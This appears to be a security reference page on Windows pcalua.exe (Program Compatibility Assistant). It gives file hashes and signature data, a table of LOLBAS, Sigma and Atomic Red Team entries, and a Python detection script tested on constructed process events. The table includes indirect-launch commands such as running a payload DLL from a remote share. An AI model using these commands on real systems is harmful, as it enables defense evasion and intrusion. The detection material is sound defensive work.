pcalua.exe

  • File Path: C:\WINDOWS\system32\pcalua.exe
  • Description: Program Compatibility Assistant

Hashes

Type Hash
MD5 F8FD8FA4C87E6DCF063A17D24A2576CE
SHA1 125565A83E6407939E314A8ADECD96F4D4130FE9
SHA256 DE0D9DF989B49D5A38758196690236C732A8E86DEB9F9487337289E10899FDC0
SHA384 C7AD6D1B6A0D11AE14F963B90F4207175990D048E9BEF593549B6EB94F0C407E8F6CF26D4346E8435E61807FA639FB10
SHA512 BAC419C1A70F05F508C19D0F48803D9ED3DA7662D58DEF0A8C85E1FA4FAFC5DB97F0ED0F92BABCF0F08534B7C5CB91664CC9A2A006D7B0DE2C4B4A180636325D
SSDEEP 1536:ZAMMTMxtBoGcFBZUv9mFNgyQZe4RDNxjJvt:ZvM+tBgBKAFNgyEDNxf

Signature

  • Status: Signature verified.
  • Serial: 330000023241FB59996DCC4DFF000000000232
  • Thumbprint: FF82BC38E1DA5E596DF374C53E3617F7EDA36B06
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename:
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.18362.1 (WinBuild.160101.0800)
  • Product Version: 10.0.18362.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

Possible Misuse

The following table collects examples, drawn from public detection and red-team repositories, of pcalua.exe being misused. pcalua.exe is not malicious in itself, but its -a switch launches whatever target it is given, which lets an adversary use it as an indirect launcher (MITRE ATT&CK T1202, Indirect Command Execution) to run a program without invoking cmd.exe directly and to sidestep controls that key on the command interpreter or on file extensions commonly associated with payloads.

Source Source File Example License
sigma proc_creation_win_indirect_cmd.yml description: Detect indirect command execution via Program Compatibility Assistant (pcalua.exe or forfiles.exe). DRL 1.0
sigma proc_creation_win_indirect_cmd.yml - '\pcalua.exe' DRL 1.0
LOLBAS Pcalua.yml Name: Pcalua.exe  
LOLBAS Pcalua.yml - Command: pcalua.exe -a calc.exe  
LOLBAS Pcalua.yml - Command: pcalua.exe -a \\server\payload.dll  
LOLBAS Pcalua.yml - Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java  
LOLBAS Pcalua.yml - Path: C:\Windows\System32\pcalua.exe  
malware-ioc misp_invisimole.json "description": "Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command-Line Interface](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)\n\nAdversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.", © ESET 2014-2018
atomic-red-team index.md - Atomic Test #1: Indirect Command Execution - pcalua.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #1: Indirect Command Execution - pcalua.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team T1202.md <blockquote>Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking cmd. For example, Forfiles, the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a Command and Scripting Interpreter, Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017) MIT License. © 2018 Red Canary
atomic-red-team T1202.md - Atomic Test #1 - Indirect Command Execution - pcalua.exe MIT License. © 2018 Red Canary
atomic-red-team T1202.md ## Atomic Test #1 - Indirect Command Execution - pcalua.exe MIT License. © 2018 Red Canary
atomic-red-team T1202.md The Program Compatibility Assistant (pcalua.exe) may invoke the execution of programs and commands from a Command-Line Interface. MIT License. © 2018 Red Canary
atomic-red-team T1202.md pcalua.exe -a #{process} MIT License. © 2018 Red Canary
atomic-red-team T1202.md pcalua.exe -a #{payload_path} MIT License. © 2018 Red Canary
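
The following is an added worked example, not code from Strontic, Sigma, LOLBAS or Red Canary. It scans a handful of constructed Sysmon-style process-creation records (fields Image, ParentImage, CommandLine) and raises a finding on the two signals the table above supports: a process whose parent is pcalua.exe (the condition the referenced Sigma rule keys on), and pcalua.exe itself being started with -a naming a target. The tokenizer and the treatment of -c as the argument switch are inferred from the commands in the table and are assumptions, not documented pcalua.exe syntax; the sample events are constructed.

```python
"""Constructed example: flag pcalua.exe used as an indirect launcher (ATT&CK T1202).

Added illustration, not code from the page's sources. Field names follow Sysmon
Event ID 1 (Image, ParentImage, CommandLine). The -a / -c switch grammar is
inferred from the LOLBAS commands in the table above and is an assumption.
"""
import re

PCALUA_SUFFIX = "\\pcalua.exe"


def _tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping double-quoted spans intact."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def is_pcalua(image):
    """True when the image path ends in \\pcalua.exe, whatever the case."""
    return image.lower().endswith(PCALUA_SUFFIX)


def parse_pcalua_cmdline(cmdline):
    """Return {'target': ..., 'args': [...]} for 'pcalua.exe -a <target> [-c <args>]'.

    Returns None when no -a target is present (assumed grammar, see module docstring).
    """
    toks = _tokenize(cmdline)
    target, args = None, []
    i = 0
    while i < len(toks):
        t = toks[i].lower()
        if t == "-a" and i + 1 < len(toks):
            target = toks[i + 1]
            i += 2
            continue
        if t == "-c":
            args = toks[i + 1:]  # everything after -c is passed to the target
            break
        i += 1
    if target is None:
        return None
    return {"target": target, "args": args}


def target_indicators(target):
    """Risk indicators derived from the launched target, as seen in the table's examples."""
    ind = []
    if target.startswith("\\\\"):
        ind.append("unc_target")        # payload pulled from a remote share
    if not target.lower().endswith(".exe"):
        ind.append("non_exe_target")    # .dll / .cpl etc. handed to an associated handler
    return ind


def classify(event):
    """Return reason strings for one process-creation event; empty list means no finding."""
    reasons = []
    if is_pcalua(event.get("ParentImage", "")):
        reasons.append("child_of_pcalua")  # same condition the Sigma rule keys on
    if is_pcalua(event.get("Image", "")):
        parsed = parse_pcalua_cmdline(event.get("CommandLine", ""))
        if parsed:
            reasons.append("pcalua_-a_target=" + parsed["target"])
            reasons.extend(target_indicators(parsed["target"]))
    return reasons


def scan(events):
    """Run classify() over a list of events and keep only those with reasons."""
    findings = []
    for e in events:
        reasons = classify(e)
        if reasons:
            findings.append({"event": e, "reasons": reasons})
    return findings


# Constructed sample events (not real telemetry). Index 4 is the benign control.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\pcalua.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"pcalua.exe -a calc.exe"},
    {"Image": r"C:\Windows\System32\calc.exe",
     "ParentImage": r"C:\Windows\System32\pcalua.exe",
     "CommandLine": r"calc.exe"},
    {"Image": r"C:\Windows\System32\pcalua.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\System32\pcalua.exe" -a "C:\Windows\system32\javacpl.cpl" -c Java'},
    {"Image": r"C:\Windows\System32\pcalua.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"pcalua.exe -a \\server\payload.dll"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f["event"]["CommandLine"], "->", ", ".join(f["reasons"]))
```

Because the Program Compatibility Assistant itself uses this binary, treat child_of_pcalua on its own as a lead rather than an alert: baseline the parent processes and targets that legitimate compatibility troubleshooting produces in your environment, and raise severity when the target is a UNC path, a non-executable file type, or something outside the usual program directories.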

MIT License. Copyright (c) 2020-2021 Strontic.